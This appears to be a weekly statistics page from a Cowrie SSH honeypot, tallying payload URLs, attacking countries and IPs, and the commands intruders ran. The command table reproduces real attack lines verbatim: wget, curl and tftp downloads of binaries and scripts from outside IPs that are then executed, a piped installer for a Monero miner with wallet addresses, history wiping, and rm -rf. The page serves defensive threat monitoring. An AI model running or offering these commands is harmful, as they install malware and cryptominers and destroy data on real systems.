Weekly Statistics

The following are stats from a server running the Cowrie SSH honeypot. The tables below show the most common payloads and commands run after connecting to the honeypot, as well as the top IP addresses and countries.
This list is updataed hourly, compiling results over the previous week.

Payloads

PayloadCount
http://194.85.249.86/x86_64;66
http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh59
http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh;56
http://195.133.18.116/lewdbins.sh;7

Countries

CountryCount
Russia1761
Germany1721
United States1709
Vietnam1706
Singapore1390
Switzerland1365

Connection IPs

Connected IPCount
5.188.62.2231738
5.188.62.2451738
5.188.62.2491738
5.188.62.2481710
45.155.204.391703
209.141.56.751691
116.105.72.491688
209.141.55.1251679
116.105.173.1771678
116.110.80.961668
116.110.124.531666
116.110.214.811661
5.188.62.2291546
68.183.180.461378
79.142.69.1601353
5.188.62.2321279
5.188.62.2191086
107.189.31.2481075
179.43.141.99984
8.225.226.100838
139.59.144.149604
209.141.60.103398
195.133.18.116232
116.106.19.24955
171.251.20.13253
116.105.72.4031
73.82.87.151

Commands

Command RunCount
cat /etc/issue; cd /tmp/; wget http://194.85.249.86/x86_64; chmod 777 *; ./x86_64 x86xhed128
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44XKLDbSztdXqao2Rs2EFFLvdjsbRwYrP1FkqdqB91v1PohHdSSTjyeKQ4t6UMFXNdYpxkNhwpi9xTRmEsk6PeUSLHCfeLR121
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 209.141.57.111/ssh || curl -o ssh 209.141.57.111/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd; ./krane 1qaz@WSX118
uname -a118
wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; chmod 777 *; ./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA118
uname -a;nproc;rm -rf ~/.bash_history;history -cw96
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA29
cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://195.133.18.116/lewdbins.sh; chmod 777 lewdbins.sh; sh lewdbins.sh; tftp 195.133.18.116 -c get lewdtftp1.sh; chmod 777 lewdtftp1.sh; sh lewdtftp1.sh; tftp -r lewdtftp2.sh -g 195.133.18.116; chmod 777 lewdtftp2.sh; sh lewdtftp2.sh; rm -rf lewdbins.sh lewdtftp1.sh lewdtftp2.sh; rm -rf *7
exit1